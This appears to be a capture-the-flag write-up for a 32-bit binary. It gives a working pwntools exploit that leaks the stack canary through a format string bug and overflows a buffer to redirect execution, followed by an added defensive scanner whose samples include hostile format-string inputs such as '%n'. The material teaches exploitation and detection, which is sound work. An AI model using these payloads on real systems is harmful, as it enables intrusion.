Challenge file: http://www.whalectf.xin/files/47a658e388a0c505fc07b6ee48a4a2e2/binary_200
32-bit binary, with NX and stack canary protection enabled.
It has both a format string vulnerability and a stack overflow; the challenge is similar to an earlier one, ending with a jump to a chosen address.
Idea: use printf to leak the canary value, write it back in place during the overflow, and then use the stack overflow to call the system function and get a shell.
Check the format string offset: the input buffer starts at argument offset 5.
Then determine the argument index that corresponds to the canary:
0x2c - 0x4 = 0x28; 0x28 / 4 = 10; 10 + 5 = 15
With the offset known, the canary can be leaked and the stack overflow carried out.
The exp follows:
from pwn import *

r = remote('bamboofox.cs.nctu.edu.tw', 22002)
e = ELF('./binary_200')
flag_addr = e.symbols['canary_protect_me']  # flag_addr = 0x804854d

# Leak the canary: the input buffer is format argument 5 and the canary
# sits 0x28 bytes (10 dwords) above it, so it is argument 15.
r.sendline(b'%15$x')
canary = int(r.recv(), 16)

# Overflow: fill the buffer up to the canary, write the leaked canary back
# unchanged, pad 0xc bytes up to the saved return address, then overwrite it.
payload = b'a' * 0x28 + p32(canary) + b'a' * 0xc + p32(flag_addr)
r.sendline(payload)
r.interactive()
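The two parts of the writeup that matter to a defender are the offset arithmetic (how far the canary is from the input buffer, expressed as a printf argument index) and the fact that a positional "%N$x" directive in untrusted input is what performs the leak. The block below, an added example that is not part of the original writeup, reproduces the page's arithmetic as a function and adds a small scanner that flags input which would read or write the stack if it ever reached printf as a format string. The function names, the regex, and the sample inputs are assumptions constructed for illustration; the regex covers common C conversion specifications and is not a complete printf grammar.

```python
import re

# Matches one C printf conversion specification, capturing an optional
# positional "N$" argument index and the conversion character.
# (Constructed for this example; simplified, not a full printf grammar.)
FMT_DIRECTIVE = re.compile(
    r"%(?P<pos>\d+\$)?[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|j|z|t|L)?"
    r"(?P<conv>[diouxXeEfFgGaAcspn%])"
)


def fmt_arg_index(buf_off, canary_off, base_index, word=4):
    """Printf argument index that lands on the canary when the input buffer
    itself is used as the format string.

    buf_off and canary_off are the frame-relative distances of the buffer
    and the canary (the page uses 0x2c and 0x4); base_index is the argument
    index of the buffer's first word (the page uses 5); word is the stack
    slot size (4 on 32-bit).
    """
    return (buf_off - canary_off) // word + base_index


def scan_input(data: bytes):
    """Return (positional_index_or_None, conversion) for each printf
    directive found in untrusted input. "%%" consumes no argument and is
    skipped."""
    text = data.decode("latin-1")
    hits = []
    for m in FMT_DIRECTIVE.finditer(text):
        if m.group("conv") == "%":
            continue
        pos = m.group("pos")
        hits.append((int(pos[:-1]) if pos else None, m.group("conv")))
    return hits


def is_suspicious(data: bytes) -> bool:
    """True when the input would read pointers/stack words (%x %X %p %s),
    write memory (%n), or address a specific argument slot (N$)."""
    return any(conv in "xXpsn" or idx is not None
               for idx, conv in scan_input(data))


# Constructed sample inputs, including the exact leak string from the writeup.
SAMPLES = [
    b"%15$x",            # positional read of argument 15 (the canary slot)
    b"%p%p%p%p",         # sequential pointer dump
    b"%n",               # memory write through printf
    b"hello world",      # benign
    b"rate is 100%",     # trailing % with no conversion: not a directive
]


def classify_samples():
    """Map each sample to its scanner verdict (used by the demo and tests)."""
    return {s: is_suspicious(s) for s in SAMPLES}


if __name__ == "__main__":
    print("canary is printf argument", fmt_arg_index(0x2c, 0x4, 5))
    for sample, flagged in classify_samples().items():
        print(f"{sample!r:20} -> {'SUSPICIOUS' if flagged else 'ok'} {scan_input(sample)}")
```

The arithmetic function makes the page's "0x2c - 0x4 = 0x28, 0x28 / 4 = 10, 10 + 5 = 15" reusable for other frame layouts, and the scanner is the kind of check a service could apply to input before logging it, or that a reviewer could run over captured requests; the real fix remains never passing user data as the format argument (printf("%s", buf) rather than printf(buf)).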